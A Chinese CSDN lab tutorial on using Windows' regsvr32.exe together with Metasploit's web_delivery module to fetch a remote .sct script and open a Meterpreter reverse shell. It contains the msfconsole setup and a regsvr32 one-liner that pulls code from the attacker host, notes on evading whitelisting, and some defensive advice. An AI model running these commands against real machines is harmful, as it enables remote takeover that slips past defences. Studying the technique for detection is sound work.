利用Regsvr32.exe通过Web Delivery实现Windows反弹Shell

最新推荐文章于 2025-09-01 15:19:10 发布
最新推荐文章于 2025-09-01 15:19:10 发布
阅读量561 收藏 4
点赞数 12
CC 4.0 BY-SA版权
分类专栏: 笔记 Windows系统命令 总结经验 文章标签: windows 网络安全 web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41905135/article/details/151008826

利用Regsvr32.exe通过Web Delivery实现Windows反弹Shell

技术原理

Regsvr32.exe是Windows系统中的一个合法命令行工具,主要用于注册和注销OLE控件(如DLL和ActiveX控件)。该程序位于%systemroot%\System32\目录下,存在于Windows XP及后续所有Windows版本中。

由于其白名单特性,攻击者常利用Regsvr32.exe执行恶意代码来绕过应用程序白名单防护。结合Metasploit的Web Delivery模块,可以通过Regsvr32发起HTTP请求获取并执行恶意负载,最终建立反向Shell连接。

实验环境

  • 攻击机: Kali Linux (192.168.1.26)
  • 靶机: Windows 11 (192.168.1.13)
  • 监听地址: 192.168.1.26 (Kali Linux IP)

操作步骤

1. 启动Metasploit并配置Web Delivery模块

msfconsole
use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.26
set SRVHOST 192.168.1.26
exploit -j

截屏2025-08-29 10.01.13

2. 在靶机上执行Regsvr32命令

在Windows 11靶机上执行以下命令:

regsvr32 /s /n /u /i:http://192.168.1.26:8080/YhLeCXJYq.sct scrobj.dll

3. 参数详解

  • /s: 静默模式,不显示消息框
  • /n: 不调用DllRegisterServer
  • /u: 卸载服务器
  • /i:http://...: 通过URL调用DllInstall并执行远程脚本

技术要点

  1. Web Delivery工作原理: Metasploit启动一个Web服务器托管恶意脚本,当Regsvr32请求该URL时,服务器返回一个恶意sct文件并被自动执行

  2. 规避检测: 使用合法系统工具Regsvr32.exe可以绕过许多安全产品的检测

  3. 无文件攻击: 攻击载荷直接从网络获取并在内存中执行,不落地磁盘

防御建议

  1. 监控Regsvr32.exe的网络连接活动
  2. 限制不必要的出站HTTP连接
  3. 实施应用程序控制策略,即使对可信程序也限制其异常行为
  4. 启用并细化进程行为监控,检测异常子进程创建

总结

这种利用方式展示了攻击者如何滥用系统自带工具进行横向移动和权限维持。作为防御方,需要采取纵深防御策略,不仅关注恶意软件本身,更要关注系统工具和合法程序的异常使用行为。

注意: 本文仅用于安全研究和教育目的,请勿用于非法活动。

内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1197
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
Windows反弹shell的方法
热门推荐
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell...
深入探究 Windows 反弹 Shell 的方法与实战
m0_57836225的博客
03-01 1156
本文详细介绍了 Windows 系统下多种反弹 Shell 的方法,包括 nc 工具、mshta 工具、rundll32regsvr32 以及 PowerShell 等方式。每种方法都有其特点和适用场景,在实际操作中,需根据目标系统环境、网络状况等因素选择合适的方法。同时,反弹 Shell 技术主要用于合法的渗透测试和安全评估场景,严禁用于非法活动。希望读者通过本文的学习,能对 Windows 反弹 Shell 技术有更深入的理解和掌握,提升网络安全攻防能力。
内网渗透之Windows反弹shell(二)
墨鱼菜鸡
09-10 168
目录 Windows反弹shell 03Rundll32.exe 04Regsvr32.exe 05Certutil.exe 内网渗透之Windows反弹shell(三)_不知名白帽的博客-CSDN博客 Windows反弹shell 03Rundll32.exe Rundll32.exeWindows操作系统相关,它允许调用从DLL导...
渗透测试-window反弹shell
lza20001103的博客
05-11 5339
window反弹shell
渗透测试面试常问-Windows 反弹shell有哪些方式
2301_79457955的博客
11-19 1830
Windows不自带nc所以一般要通过上传nc.exe实现。NC正向shellNC反向shell
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 4032
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
使用rundll32.exe绕过应用程序白名单(多种方法)
渗透测试研究中心
03-07 177
0x00 前言 本文演示了白名单AppLocker bypass的最常见和最熟悉的技术。我们知道,出于安全原因,系统管理员添加组策略来限制本地用户的应用程序执行。在上一篇文章中,我们讨论了“Windows Applocker策略 - 初学者指南”,因为它们为应用程序控制策略定义了AppLocker规则,以及如何使用它们。但今天您将学习如何使用rundll文件绕过AppLocker策略。 DLL...
渗透测试常用反弹shell方法(如何渗透测试反弹shell)—Windows篇渗透测试!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-24 866
反弹Shell技术简介 反弹Shell是一种远程控制技术,分为正向和反向两种类型。正向Shell由攻击机主动连接目标机,但易受防火墙限制;反向Shell则由目标机主动连接攻击机,更易绕过安全防护。 常用反弹Shell方法包括: NetCat(NC):需上传到目标机,通过监听端口实现控制 mshta.exe利用Windows的HTML应用程序执行恶意脚本 rundll32.exe:调用DLL文件实现远程控制 文章详细介绍了这些技术的具体实现步骤,包括使用Metasploit和Cobalt Strike等工具
39.远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58)1
08-03
远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58)1】这篇文章主要探讨了如何利用白名单程序Regsvr32.exe来绕过反病毒软件的检测,以实现payload的执行。Regsvr32.exe是一个Windows系统自带的命令行...
调用"Regsvr32.exe"注册dll文件
01-08
调用"Regsvr32.exe"注册dll文件的C#应用程序
regsvr32.exe进程是什么.docx
09-27
Windows操作系统中,regsvr32.exe进程是一项不可或缺的组件,它在维护系统稳定性与安全性方面发挥着关键作用。由于其功能主要与注册动态链接库(DLL)文件和ActiveX控件相关,regsvr32.exe常常与系统维护及修复任务...
win7 64位旗舰版系统运行regsvr32.exe提示不兼容怎么办.docx
09-27
在 Win7 64位旗舰版系统中,运行 regsvr32.exe 时可能会提示不兼容的错误,这是因为在 64 位系统中,运行 Regsvr32 注册 DLL 文件时默认使用的是 64 位版本的 Regsvr32.exe,而命令需要的是 32 位版本的 Regsvr32....
regsvr32.exe问题解决方案
02-02
### regsvr32.exe问题解决方案 在遇到电脑无法打开所有邮箱及QQ空间的情况时,用户发现这并非由病毒或恶意软件引起,而是浏览器出现了问题。进一步排查后,得知可能是由于jscript.dll文件未被正确注册所导致。通过...
list 手动实现
moringlightyn的博客
08-28 1520
尾插要先给先新节点newNode申请一个空间 插入之前要先保存一下插入之前的最后一个元素的地址到prev 然后断开之前最后一个元素和头结点的连接 然后让prev的_next指向newNode newNode的_prev指向prev head的_prev指向newNode newNode的_next指向head。迭代器在对外使用上我们其实就可以把它当做节点类型的指针 (里面的唯一成员变量就是节点类型的指针 在类里面对这个成员变量的操作 类型对外的表现上像指针一样 且实现的功能由里面的重载决定)
数据结构初阶:详解双链表
2302_80761497的博客
08-28 974
本文详细介绍了双向链表(带头双向循环链表)的实现与优化。主要内容包括:1. 链表的基本概念和分类,重点分析双向链表的结构特点;2. 双向链表的完整实现过程,包括初始化、增删查改等核心操作,每个操作都配有详细代码;3. 性能优化方案,通过调整接口一致性(统一使用一级指针)来降低用户使用难度;4. 对比分析链表与顺序表的适用场景,建议根据数据操作需求(频繁插入删除用链表,大量数据访问用顺序表)选择合适的数据结构。文章提供了完整的可执行代码,并特别强调了双向链表中哨兵位(头节点)的特殊处理方式。
使用原生excel方式导入excel
最新发布
走走停停
09-01 187
module.exports = { dev: { // Paths assetsSubDirectory: 'static', assetsPublicPath: '/', proxyTable: { '/aaa': { target: 'http://192.168.1.126:8083/aaa/', // 接口的域名 secure: false,// 如果是https接口,需要配置这个参数 cha...
【商业银行风控模型(python版本,实操合集,附带anaconda安装教程,持续更新)】
The丶Star
09-01 267
Anaconda安装与Python环境配置指南 本文介绍了Anaconda的安装流程和基本操作命令,包括: Mac系统下Anaconda的下载安装步骤 Conda包管理常用命令(安装/卸载/查询包) Python虚拟环境创建与管理方法 常见Python报错解决方案(如numpy导入错误等) 国内镜像源配置和常用数据处理代码片段 Python开发环境准备所需的库安装命令 文章还提供了数据分析处理的基础代码模板和文件头生成函数,适合Python初学者快速搭建开发环境。
Java集合操作:Apache Commons Collections4启示录
static_coder的博客
08-28 305
对于不常用的工具可能也不关注,使用工具时,稍微看看工具包的其他工具,可能会发现新天地。)提供了丰富的集合操作工具,但在实际开发中,我们常常会遇到一些更复杂、更繁琐的场景,需要编写大量样板代码。这个工具类真的是太香了,不仅可以实现集合的交集、差集、合集、并集等,还可以进行集合分割、检测等操作。版本的升级,集合的流式操作也变的简洁。还有其他的一些小的工具类,就不一一列举了。是一个功能极其强大的工具库,如果之用了其中的一小部分功能,就显的有点浪费了。是扩展的集合类,可以存储重复的值,会自动统计个数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bruce_xiaowei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值